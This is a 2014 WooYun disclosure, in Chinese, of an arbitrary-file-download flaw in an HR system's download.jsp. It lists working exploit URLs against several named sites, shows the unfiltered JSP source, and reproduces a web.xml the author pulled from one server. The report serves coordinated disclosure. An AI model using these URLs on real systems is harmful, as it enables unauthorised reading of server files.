当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062275

漏洞标题:某人力资源系统任意文件下载(多家人力资源网存在问题)

相关厂商:cncert国家互联网应急中心

漏洞作者: 风情万种

提交时间:2014-05-30 10:31

修复时间:2014-08-28 10:32

公开时间:2014-08-28 10:32

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-30: 细节已通知厂商并且等待厂商处理中
2014-06-04: 厂商已经确认,细节仅向厂商公开
2014-06-07: 细节向第三方安全合作伙伴开放
2014-07-29: 细节向核心白帽子及相关领域专家公开
2014-08-08: 细节向普通白帽子公开
2014-08-18: 细节向实习白帽子公开
2014-08-28: 细节向公众公开

简要描述:

某人力资源系统任意文件下载(多家人力资源网存在问题)

详细说明:

任意文件下载的链接
http://www.lhjy.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp
http://www.zjdeqing.lm.gov.cn/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp
http://www.lhrlzyw.com/tabledownload/download.jsp?url=Dredboy5711%5Cweblh%5Cwebapp-lh%5Ctabledownload%5C&id=&filename=download.jsp
http://www.dqlm.com/tabledownload/download.jsp?url=Dredboy5711%5Cdqwebnew%5Cwebapp-dq%5Ctabledownload%5C&id=&filename=download.jsp
http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5Ctabledownload%5C&id=&filename=download.jsp
download.jsp没有做任何的判断和过滤导致任意文件下载

<%@ page contentType="text/html;charset=gb2312" 
import="com.jspsmart.upload.*,java.io.File" %><%
// 新建一个SmartUpload对象
SmartUpload su = new SmartUpload();
// 初始化
su.initialize(pageContext);
// 设定contentDisposition为null以禁止浏览器自动打开文件,
//保证点击链接后是下载文件。若不设定,则下载的文件扩展名为
//doc时,浏览器将自动用word打开它。扩展名为pdf时,
//浏览器将用acrobat打开。
su.setContentDisposition(null);
// 下载文件
String url=request.getParameter("url");
	url=url.replaceAll("redboy5711",":");
String id=request.getParameter("id");
String filename=request.getParameter("filename");
System.out.println("path11========="+filename);
//filename=new String(filename.getBytes("ISO-8859-1"),"GB2312");		
System.out.println("path222========="+filename);
String path=url+id+File.separator+filename;
su.downloadFile(path);
%>


我再下个web.xml试试
http://www.fzjob.net:9090/tabledownload/download.jsp?url=Dredboy5711%5Cjxfzweb%5CWEB-INF%5C&id=&filename=web.xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
  PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
  "http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
<web-app>
	<display-name>TZSW WEB Application</display-name>
    
  	<session-config>
		<session-timeout>15</session-timeout>		
	</session-config>	
	
	<filter>
		<filter-name>EncodingFilter</filter-name>
		<filter-class>com.tzsw.plat.webcontroller.EncodingFilter</filter-class>
	</filter>
	<filter>
	    <filter-name>HeadFilter</filter-name>
    	<filter-class>com.tzsw.plat.webcontroller.HeadFilter</filter-class>
	</filter>
	<filter>
    	<filter-name>SaftyFilter</filter-name>
	    <filter-class>com.tzsw.plat.webcontroller.SaftyFilter</filter-class>
	</filter>
	
 
	
	<filter-mapping>
		<filter-name>EncodingFilter</filter-name>
		<url-pattern>*.jsp</url-pattern>
	</filter-mapping>
	<filter-mapping>
		<filter-name>EncodingFilter</filter-name>
		<url-pattern>*.do</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
    	<filter-name>HeadFilter</filter-name>
    	<url-pattern>/MainServlet</url-pattern>
	</filter-mapping>
	
	<filter-mapping>
 	   <filter-name>SaftyFilter</filter-name>
  	  <url-pattern>*.jsp</url-pattern>
	</filter-mapping>
	<filter-mapping>
 	   <filter-name>SaftyFilter</filter-name>
  	  <url-pattern>*.do</url-pattern>
	</filter-mapping>
	<filter-mapping>
 	   <filter-name>SaftyFilter</filter-name>
  	  <url-pattern>/MainServlet</url-pattern>
	</filter-mapping>
	<servlet>
		<servlet-name>MainServlet</servlet-name>
		<servlet-class>com.tzsw.plat.webcontroller.MainServlet</servlet-class>
		<init-param>
			<param-name>wl-dispatch-policy</param-name>
			<param-value>servletQueue</param-value>
		</init-param>
		<load-on-startup>1</load-on-startup>
	</servlet>
	
	<servlet>
		<servlet-name>ActionServlet</servlet-name>
		<servlet-class>org.apache.struts.action.ActionServlet</servlet-class>
		<init-param>
			<param-name>config</param-name>
			<param-value>/WEB-INF/struts-config.xml</param-value>
		</init-param>
		<load-on-startup>2</load-on-startup>
	</servlet>
	<servlet>
		<servlet-name>JMSListenerServlet</servlet-name>
		<servlet-class>com.tzsw.plat.webcontroller.LogMsgServlet</servlet-class>
		<load-on-startup>3</load-on-startup>
	</servlet>
	<servlet>
		<servlet-name>Connector</servlet-name>
		<servlet-class>com.fredck.FCKeditor.connector.ConnectorServlet</servlet-class>
		<init-param>
			<param-name>baseDir</param-name>
			<param-value>/UserFiles/</param-value>
		</init-param>
		<init-param>
			<param-name>debug</param-name>
			<param-value>true</param-value>
		</init-param>
		<load-on-startup>1</load-on-startup>
	</servlet>
	<servlet>
		<servlet-name>SimpleUploader</servlet-name>
		<servlet-class>com.fredck.FCKeditor.uploader.SimpleUploaderServlet</servlet-class>
		<init-param>
			<param-name>baseDir</param-name>
			<param-value>/UserFiles/</param-value>
		</init-param>
		<init-param>
			<param-name>debug</param-name>
			<param-value>true</param-value>
		</init-param>
		<init-param>
			<param-name>enabled</param-name>
			<param-value>true</param-value>
		</init-param>
		<init-param>
			<param-name>AllowedExtensionsFile</param-name>
			<param-value></param-value>
		</init-param>
		<init-param>
			<param-name>DeniedExtensionsFile</param-name>
			<param-value>php|php3|php5|phtml|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|dll|reg|cgi</param-value>
		</init-param>
		<init-param>
			<param-name>AllowedExtensionsImage</param-name>
			<param-value>jpg|gif|jpeg|png|bmp</param-value>
		</init-param>
		<init-param>
			<param-name>DeniedExtensionsImage</param-name>
			<param-value></param-value>
		</init-param>
		<init-param>
			<param-name>AllowedExtensionsFlash</param-name>
			<param-value>swf|fla</param-value>
		</init-param>
		<init-param>
			<param-name>DeniedExtensionsFlash</param-name>
			<param-value></param-value>
		</init-param>
		<load-on-startup>1</load-on-startup>
	</servlet>
	<servlet-mapping>
		<servlet-name>MainServlet</servlet-name>
		<url-pattern>/MainServlet</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>ActionServlet</servlet-name>
		<url-pattern>*.do</url-pattern>
	</servlet-mapping>
	<servlet-mapping>
		<servlet-name>JMSListenerServlet</servlet-name>
		<url-pattern>/JMSListenerServlet</url-pattern>
	</servlet-mapping>
  <servlet-mapping>
    <servlet-name>Connector</servlet-name>
    <url-pattern>/admin/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector</url-pattern>
  </servlet-mapping>
  
  <servlet-mapping>
    <servlet-name>SimpleUploader</servlet-name>
    <url-pattern>/admin/FCKeditor/editor/filemanager/upload/simpleuploader</url-pattern>
  </servlet-mapping>  
	<welcome-file-list>
		<welcome-file>default.jsp</welcome-file>
		<welcome-file>login.jsp</welcome-file>
	</welcome-file-list> 
	
	<!-- The default error page -->
	<error-page>
		<exception-type>java.lang.Exception</exception-type>
		<location>/Error.jsp</location>
	</error-page>
   <taglib>
    <taglib-uri>/FCKeditor</taglib-uri>
    <taglib-location>/WEB-INF/FCKeditor.tld</taglib-location>
  </taglib>
	 <taglib>
    <taglib-uri>/WEB-INF/struts-bean.tld</taglib-uri>
    <taglib-location>/WEB-INF/struts-bean.tld</taglib-location>
  </taglib>
  <taglib>
    <taglib-uri>/WEB-INF/struts-html.tld</taglib-uri>
    <taglib-location>/WEB-INF/struts-html.tld</taglib-location>
  </taglib>
  <taglib>
    <taglib-uri>/WEB-INF/struts-logic.tld</taglib-uri>
    <taglib-location>/WEB-INF/struts-logic.tld</taglib-location>
  </taglib>
  <taglib>
    <taglib-uri>/WEB-INF/struts-template.tld</taglib-uri>
    <taglib-location>/WEB-INF/struts-template.tld</taglib-location>
  </taglib>
  <taglib>
    <taglib-uri>/WEB-INF/struts-tiles.tld</taglib-uri>
    <taglib-location>/WEB-INF/struts-tiles.tld</taglib-location>
  </taglib>
  <taglib>
    <taglib-uri>/WEB-INF/struts-nested.tld</taglib-uri>
    <taglib-location>/WEB-INF/struts-nested.tld</taglib-location>
  </taglib>
	
	<resource-ref>
         <res-ref-name>jdbc/webCoreDS</res-ref-name>
         <res-type>javax.sql.DataSource</res-type>
         <res-auth>Container</res-auth>
	</resource-ref>
</web-app>

漏洞证明:

QQ截图20140525151347.png


修复方案:

.......不解释

版权声明:转载请注明来源 风情万种@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-06-04 09:57

厂商回复:

根据测试结果,确认软件生产厂商为浙江天正思维信息技术有限公司。根据其公开的联系渠道,电话无人接听。按照测试用例,已经分别发给CNCERT江西和浙江分中心进行案例通报处置。

最新状态:

暂无